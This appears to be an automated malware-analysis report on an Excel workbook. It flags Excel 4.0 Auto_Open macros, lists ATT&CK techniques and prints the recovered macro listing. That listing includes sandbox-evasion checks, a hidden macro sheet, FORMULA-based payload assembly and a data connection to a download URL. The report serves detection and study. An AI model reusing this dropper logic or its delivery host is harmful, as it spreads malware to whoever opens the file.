MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a critical finding. The macros utilize dangerous functions such as RUN, indicating an attempt to execute arbitrary code. The embedded URL is likely used to download and execute a second-stage payload, a common technique for malware distribution.
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://tdvomds.pw/12341324rfefv In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 3945 bytes |
SHA-256: ee59d85224c1920ac9db3da415149bfcfab2c55289a822195180a77095a65df4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - 0TQ1ByZPP
' 0018 40 LABEL : Cell Value, String Constant - _1451345341fff len=11 ptgArea3d *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x00\x00E\x00H\x00\x12\x00\x12\x00'
' 0018 30 LABEL : Cell Value, String Constant - agawf23f len=7 ptgRef3d 0TQ1ByZPP!U33
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d 0TQ1ByZPP!H23
' 0018 31 LABEL : Cell Value, String Constant - rstegerg3 len=7 ptgRef3d 0TQ1ByZPP!U35
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' 0TQ1ByZPP,D23,"WORKBOOK.HIDE("0TQ1ByZPP5",TRUE)",""
' 0TQ1ByZPP,H23,"IF(GET.WORKSPACE(42),,CLOSE(TRUE))",""
' 0TQ1ByZPP,H24,GET.WORKSPACE(13),""
' 0TQ1ByZPP,H25,GET.WORKSPACE(14),""
' 0TQ1ByZPP,H26,"IF(H24<770,CLOSE(FALSE),)",""
' 0TQ1ByZPP,H27,"IF(H25<381,CLOSE(FALSE),)",""
' 0TQ1ByZPP,H28,"IF(GET.WORKSPACE(19),,CLOSE(TRUE))",""
' 0TQ1ByZPP,H29,"IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),ON.TIME(NOW()+"00:00:02","agawf23f"),CLOSE(TRUE))",""
' 0TQ1ByZPP,H30,RETURN(),""
' 0TQ1ByZPP,U33,"IF(ISNUMBER(SEARCH("s", Sheet!S70)),GOTO(P54),ON.TIME(NOW()+"00:00:02","rstegerg3"))",""
' 0TQ1ByZPP,U34,RETURN(),""
' 0TQ1ByZPP,U35,"IF(ISNUMBER(SEARCH("s", Sheet!S70)),GOTO(P54),ON.TIME(NOW()+"00:00:02","agawf23f"))",""
' 0TQ1ByZPP,U36,RETURN(),""
' 0TQ1ByZPP,P54,"FORMULA( Sheet!S70,O54)",""
' 0TQ1ByZPP,P55,"FORMULA( Sheet!S71,O55)",""
' 0TQ1ByZPP,P56,"FORMULA( Sheet!S72,O56)",""
' 0TQ1ByZPP,P57,"FORMULA( Sheet!S73,O57)",""
' 0TQ1ByZPP,P58,"FORMULA( Sheet!S74,O58)",""
' 0TQ1ByZPP,P59,"FORMULA( Sheet!S75,O59)",""
' 0TQ1ByZPP,P60,"FORMULA( Sheet!S76,O60)",""
' 0TQ1ByZPP,P61,"FORMULA( Sheet!S77,O61)",""
' 0TQ1ByZPP,P62,"FORMULA( Sheet!S78,O62)",""
' 0TQ1ByZPP,P63,"FORMULA( Sheet!S79,O63)",""
' 0TQ1ByZPP,P64,"FORMULA( Sheet!S80,O64)",""
' 0TQ1ByZPP,P65,"FORMULA( Sheet!S81,O65)",""
' 0TQ1ByZPP,P66,"FORMULA( Sheet!S82,O66)",""
' 0TQ1ByZPP,P67,"FORMULA( Sheet!S83,O67)",""
' 0TQ1ByZPP,P68,"FORMULA( Sheet!S84,O68)",""
' 0TQ1ByZPP,P69,"FORMULA( Sheet!S85,O69)",""
' 0TQ1ByZPP,P70,"FORMULA( Sheet!S86,O70)",""
' 0TQ1ByZPP,P71,"FORMULA( Sheet!S87,O71)",""
' 0TQ1ByZPP,P72,"FORMULA( Sheet!S88,O72)",""
' 0TQ1ByZPP,P73,"FORMULA( Sheet!S89,O73)",""
' 0TQ1ByZPP,P74,"FORMULA( Sheet!S90,O74)",""
' 0TQ1ByZPP,P75,"FORMULA( Sheet!S91,O75)",""
' 0TQ1ByZPP,P76,"FORMULA( Sheet!S92,O76)",""
' 0TQ1ByZPP,P77,"FORMULA( Sheet!S93,O77)",""
' 0TQ1ByZPP,P78,"FORMULA( Sheet!S94,O78)",""
' 0TQ1ByZPP,P79,"FORMULA( Sheet!S95,O79)",""
' 0TQ1ByZPP,P80,"FORMULA( Sheet!S96,O80)",""
' 0TQ1ByZPP,P81,"FORMULA( Sheet!S97,O81)",""
' 0TQ1ByZPP,P82,"FORMULA( Sheet!S98,O82)",""
' 0TQ1ByZPP,P83,"FORMULA( Sheet!S99,O83)",""
' 0TQ1ByZPP,P84,"FORMULA( Sheet!S100,O84)",""
' 0TQ1ByZPP,P85,"FORMULA( Sheet!S101,O85)",""
' 0TQ1ByZPP,P86,"FORMULA( Sheet!S102,O86)",""
' 0TQ1ByZPP,P87,"FORMULA( Sheet!S103,O87)",""
' 0TQ1ByZPP,P88,"FORMULA( Sheet!S104,O88)",""
' 0TQ1ByZPP,P89,"FORMULA( Sheet!S105,O89)",""
' 0TQ1ByZPP,P90,"FORMULA( Sheet!S106,O90)",""
' 0TQ1ByZPP,P91,"FORMULA( Sheet!S107,O91)",""
' 0TQ1ByZPP,P92,"FORMULA( Sheet!S108,O92)",""
' 0TQ1ByZPP,P93,"FORMULA( Sheet!S109,O93)",""
' 0TQ1ByZPP,P94,GOTO(O54),""
' 0TQ1ByZPP,P95,RETURN(),""
' 0876 139 DCONN : Data Connection
' ASCII:
' Connection
' https://tdvomds.pw/12341324rfefv
' Sheet1!1451345341fff
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.